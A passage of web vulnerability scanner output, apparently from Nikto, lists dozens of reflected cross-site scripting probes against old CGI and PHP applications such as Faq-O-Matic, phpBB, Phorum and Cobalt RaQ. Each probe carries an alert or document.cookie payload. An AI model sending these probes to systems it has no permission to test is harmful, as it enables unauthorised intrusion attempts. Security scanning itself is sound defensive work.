  839. + OSVDB-54110: /index.1.html/cgis/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  840. + OSVDB-54110: /index.1.html/scripts/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  841. + OSVDB-54110: /index.1.html/cgi-win/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  842. + OSVDB-54110: /index.1.html/fcgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  843. + OSVDB-54110: /index.1.html/cgi-exe/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  844. + OSVDB-54110: /index.1.html/cgi-home/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  845. + OSVDB-54110: /index.1.html/cgi-perl/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  846. + OSVDB-54110: /index.1.html/scgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  847. + OSVDB-54110: /index.1.html/cgi-bin-sdb/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  848. + OSVDB-54110: /index.1.html/cgi-mod/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  849. + OSVDB-2748: /index.1.html/cgi.cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  850. + OSVDB-2748: /index.1.html/webcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  851. + OSVDB-2748: /index.1.html/cgi-914/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  852. + OSVDB-2748: /index.1.html/cgi-915/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  853. + OSVDB-2748: /index.1.html/bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  854. + OSVDB-2748: /index.1.html/cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  855. + OSVDB-2748: /index.1.html/mpcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  856. + OSVDB-2748: /index.1.html/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  857. + OSVDB-2748: /index.1.html/ows-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  858. + OSVDB-2748: /index.1.html/cgi-sys/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  859. + OSVDB-2748: /index.1.html/cgi-local/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  860. + OSVDB-2748: /index.1.html/htbin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  861. + OSVDB-2748: /index.1.html/cgibin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  862. + OSVDB-2748: /index.1.html/cgis/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  863. + OSVDB-2748: /index.1.html/scripts/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  864. + OSVDB-2748: /index.1.html/cgi-win/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  865. + OSVDB-2748: /index.1.html/fcgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  866. + OSVDB-2748: /index.1.html/cgi-exe/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  867. + OSVDB-2748: /index.1.html/cgi-home/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  868. + OSVDB-2748: /index.1.html/cgi-perl/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  869. + OSVDB-2748: /index.1.html/scgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  870. + OSVDB-2748: /index.1.html/cgi-bin-sdb/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  871. + OSVDB-2748: /index.1.html/cgi-mod/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
  872. + OSVDB-651: /index.1.html/cgi.cgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  873. + OSVDB-651: /index.1.html/webcgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  874. + OSVDB-651: /index.1.html/cgi-914/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  875. + OSVDB-651: /index.1.html/cgi-915/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  876. + OSVDB-651: /index.1.html/bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  877. + OSVDB-651: /index.1.html/cgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  878. + OSVDB-651: /index.1.html/mpcgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  879. + OSVDB-651: /index.1.html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  880. + OSVDB-651: /index.1.html/ows-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  881. + OSVDB-651: /index.1.html/cgi-sys/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  882. + OSVDB-651: /index.1.html/cgi-local/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  883. + OSVDB-651: /index.1.html/htbin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  884. + OSVDB-651: /index.1.html/cgibin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  885. + OSVDB-651: /index.1.html/cgis/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  886. + OSVDB-651: /index.1.html/scripts/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  887. + OSVDB-651: /index.1.html/cgi-win/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  888. + OSVDB-651: /index.1.html/fcgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  889. + OSVDB-651: /index.1.html/cgi-exe/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  890. + OSVDB-651: /index.1.html/cgi-home/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  891. + OSVDB-651: /index.1.html/cgi-perl/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  892. + OSVDB-651: /index.1.html/scgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  893. + OSVDB-651: /index.1.html/cgi-bin-sdb/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  894. + OSVDB-651: /index.1.html/cgi-mod/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  895. + OSVDB-5031: /index.1.html/cgi.cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  896. + OSVDB-5031: /index.1.html/webcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  897. + OSVDB-5031: /index.1.html/cgi-914/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  898. + OSVDB-5031: /index.1.html/cgi-915/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  899. + OSVDB-5031: /index.1.html/bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  900. + OSVDB-5031: /index.1.html/cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  901. + OSVDB-5031: /index.1.html/mpcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  902. + OSVDB-5031: /index.1.html/cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  903. + OSVDB-5031: /index.1.html/ows-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  904. + OSVDB-5031: /index.1.html/cgi-sys/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  905. + OSVDB-5031: /index.1.html/cgi-local/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  906. + OSVDB-5031: /index.1.html/htbin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  907. + OSVDB-5031: /index.1.html/cgibin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  908. + OSVDB-5031: /index.1.html/cgis/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  909. + OSVDB-5031: /index.1.html/scripts/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  910. + OSVDB-5031: /index.1.html/cgi-win/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  911. + OSVDB-5031: /index.1.html/fcgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  912. + OSVDB-5031: /index.1.html/cgi-exe/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  913. + OSVDB-5031: /index.1.html/cgi-home/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  914. + OSVDB-5031: /index.1.html/cgi-perl/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  915. + OSVDB-5031: /index.1.html/scgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  916. + OSVDB-5031: /index.1.html/cgi-bin-sdb/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  917. + OSVDB-5031: /index.1.html/cgi-mod/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  918. + OSVDB-9283: /index.1.html/cgi.cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  919. + OSVDB-9283: /index.1.html/webcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  920. + OSVDB-9283: /index.1.html/cgi-914/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  921. + OSVDB-9283: /index.1.html/cgi-915/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  922. + OSVDB-9283: /index.1.html/bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  923. + OSVDB-9283: /index.1.html/cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  924. + OSVDB-9283: /index.1.html/mpcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  925. + OSVDB-9283: /index.1.html/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  926. + OSVDB-9283: /index.1.html/ows-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  927. + OSVDB-9283: /index.1.html/cgi-sys/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  928. + OSVDB-9283: /index.1.html/cgi-local/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  929. + OSVDB-9283: /index.1.html/htbin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  930. + OSVDB-9283: /index.1.html/cgibin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  931. + OSVDB-9283: /index.1.html/cgis/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  932. + OSVDB-9283: /index.1.html/scripts/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  933. + OSVDB-9283: /index.1.html/cgi-win/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  934. + OSVDB-9283: /index.1.html/fcgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  935. + OSVDB-9283: /index.1.html/cgi-exe/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  936. + OSVDB-9283: /index.1.html/cgi-home/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  937. + OSVDB-9283: /index.1.html/cgi-perl/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  938. + OSVDB-9283: /index.1.html/scgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  939. + OSVDB-9283: /index.1.html/cgi-bin-sdb/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  940. + OSVDB-9283: /index.1.html/cgi-mod/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  941. + /index.1.html/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
  942. + /index.1.html/~/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
  943. + /index.1.html/~/<script>alert('Vulnerable')</script>.asp: Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
  944. + OSVDB-41361: /index.1.html/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>: MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  945. + OSVDB-9238: /index.1.html/supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  946. + OSVDB-9238: /index.1.html/supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  947. + OSVDB-9238: /index.1.html/supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  948. + /index.1.html/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
  949. + OSVDB-2689: /index.1.html/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>: Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
  950. + /index.1.html/samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  951. + /index.1.html/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  952. + /index.1.html/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  953. + /index.1.html/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  954. + /index.1.html/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  955. + OSVDB-2193: /index.1.html/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>: phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  956. + OSVDB-4297: /index.1.html/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  957. + OSVDB-11145: /index.1.html/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  958. + OSVDB-11144: /index.1.html/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  959. + /index.1.html/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>: Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to the latest version.
  960. + /index.1.html/node/view/666\"><script>alert(document.domain)</script>: Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  961. + OSVDB-5106: /index.1.html/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  962. + /index.1.html/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>: RaQ3 server script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
